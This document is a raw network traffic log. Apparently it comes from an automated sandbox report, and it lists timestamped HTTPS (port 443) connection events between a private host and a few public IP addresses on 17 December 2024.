                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.183415890 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.183731079 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.183757067 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.189544916 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.189554930 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.189574003 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.189595938 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.189616919 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.189636946 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.189661026 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.190080881 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.194164991 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.197388887 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.197436094 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.197460890 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.197479010 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.197729111 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.202100039 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.202471018 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.202493906 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.203217030 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.205147028 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.206026077 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.206037045 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.206541061 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.209984064 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.210083008 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.214035988 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.214078903 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.214345932 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.214359045 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.214610100 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.218214035 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.218224049 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.218595028 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.221061945 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.222171068 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.222179890 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.222397089 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.228070974 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.228348970 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.228358984 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.230855942 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.230866909 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.231158018 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.238195896 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.238473892 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.246287107 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.246428013 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.250617981 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.250700951 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.258419037 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.258676052 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.270422935 CET4434980335.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.270503044 CET4434980335.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.270762920 CET49803443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.270790100 CET4434980335.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.271364927 CET49803443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.271368027 CET49804443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.271406889 CET4434980435.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.271413088 CET49803443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.271769047 CET49804443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.271769047 CET49804443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.271800041 CET4434980435.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.276319027 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.276330948 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.323903084 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.347554922 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.349873066 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.350107908 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.350136042 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.354754925 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.355515957 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.355535030 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.359749079 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.359873056 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.359889030 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.368725061 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.369040966 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.369057894 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.371817112 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.371931076 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.373526096 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.373723984 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.373737097 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.374018908 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.377454996 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.377608061 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.382750988 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.382769108 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.382854939 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.382879019 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.383176088 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.383196115 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.383332968 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.389626980 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.389715910 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.391949892 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.391963959 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.392138004 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.392903090 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.392998934 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.393002033 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.393114090 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.397170067 CET49801443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.397195101 CET44349801104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.401546955 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.401563883 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.402159929 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.410568953 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.410675049 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.415390015 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.415462017 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.425417900 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.425544024 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.539578915 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.539717913 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.544714928 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.544902086 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.548619032 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.548996925 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.556303978 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.556375027 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.563553095 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.563684940 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.567111969 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.567183018 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.574193954 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.574553013 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.581433058 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.581823111 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.588505983 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.588752985 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.592041016 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.592288017 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.599236012 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.599539042 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.602852106 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.603087902 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.610404968 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.610677004 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.617069960 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.617383957 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.624115944 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.624433041 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.627583981 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.627701044 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.627731085 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.627861977 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.627861977 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.634103060 CET49805443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.634154081 CET44349805104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.637651920 CET49805443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.637651920 CET49805443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.637700081 CET44349805104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.929095984 CET49802443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:08.929132938 CET44349802104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.482616901 CET4434980435.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.484437943 CET49804443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.484479904 CET4434980435.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.484913111 CET4434980435.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.488379955 CET49804443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.488490105 CET4434980435.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.490174055 CET49804443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.535330057 CET4434980435.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.795617104 CET49806443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.795679092 CET44349806104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.795763969 CET49806443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.796024084 CET49806443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.796040058 CET44349806104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.882627010 CET44349805104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.883152008 CET49805443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.883181095 CET44349805104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.883512974 CET44349805104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.883941889 CET49805443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.884016037 CET44349805104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.884115934 CET49805443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.884924889 CET49679443192.168.2.1852.182.141.63
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.927339077 CET44349805104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.945494890 CET4434980435.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.945586920 CET4434980435.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.945734024 CET49804443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.946114063 CET49804443192.168.2.1835.190.80.1
                                                                                                                                                                                                                          Dec 17, 2024 18:21:09.946135998 CET4434980435.190.80.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:10.354266882 CET44349805104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:10.354367018 CET44349805104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:10.354482889 CET49805443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:10.355149031 CET49805443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:10.355170012 CET44349805104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.009202957 CET44349806104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.009763956 CET49806443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.009798050 CET44349806104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.010176897 CET44349806104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.010524988 CET49806443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.010601044 CET44349806104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.010734081 CET49806443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.051341057 CET44349806104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.455578089 CET44349806104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.455679893 CET44349806104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.455765009 CET44349806104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.455799103 CET49806443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.455837965 CET49806443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.457146883 CET49806443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.457173109 CET44349806104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.462878942 CET49807443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.462929010 CET44349807104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.463062048 CET49807443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.463453054 CET49807443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:11.463463068 CET44349807104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:12.679605007 CET44349807104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:12.679989100 CET49807443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:12.680016041 CET44349807104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:12.680490017 CET44349807104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:12.680824995 CET49807443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:12.680910110 CET44349807104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:12.680984974 CET49807443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:12.727334023 CET44349807104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.144805908 CET44349807104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.144908905 CET44349807104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.144977093 CET49807443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.145814896 CET49807443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.145839930 CET44349807104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.149101019 CET49808443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.149154902 CET44349808104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.149229050 CET49808443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.149465084 CET49808443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.149478912 CET44349808104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.216495037 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.216537952 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.216680050 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.217072964 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:13.217082024 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.361634970 CET44349808104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.362123013 CET49808443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.362157106 CET44349808104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.363264084 CET44349808104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.363687038 CET49808443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.363890886 CET49808443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.364722013 CET44349808104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.416944027 CET49808443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.429064989 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.429506063 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.429523945 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.429883003 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.430247068 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.430315971 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.430411100 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.430459023 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.430489063 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.430572033 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.430603027 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.812015057 CET44349808104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.812099934 CET44349808104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.812223911 CET49808443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.812884092 CET49808443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:14.812902927 CET44349808104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.071861982 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.071913958 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.072063923 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.072097063 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.073141098 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.073174953 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.073354006 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.073368073 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.073484898 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.073925972 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.080238104 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.080358028 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.080373049 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.088828087 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.088936090 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.088948011 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.134958029 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.134987116 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.183193922 CET49809443192.168.2.18104.18.95.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.191771030 CET44349809104.18.95.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:15.247174978 CET49809443192.168.2.18104.18.95.41
